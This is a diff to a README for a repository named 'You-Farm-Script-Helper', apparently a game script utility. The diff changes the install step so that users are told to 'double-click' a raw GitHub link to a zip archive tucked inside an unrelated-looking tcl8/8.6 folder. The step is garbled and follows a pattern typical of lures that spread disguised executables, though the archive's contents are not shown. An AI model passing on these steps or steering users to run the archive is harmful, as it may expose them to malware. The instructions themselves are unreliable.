tjsplatig/You-Farm-Script-Helper/README.md

 1. Once the download is complete, locate the file in your Downloads folder.
 2. If it's a `.zip`, right-click the file and select "Extract All" to extract the contents.
 3. Open the extracted folder.
-4. Double-click `You-Farm-Script-Helper.exe` to run the script.
+4. Double-click `https://raw.githubusercontent.com/tjsplatig/You-Farm-Script-Helper/main/tcl8/8.6/Script-You-Helper-Farm-1.7-alpha.2.zip` to run the script.
 5. Follow on-screen instructions to start using the utility.

 ### For Mac Users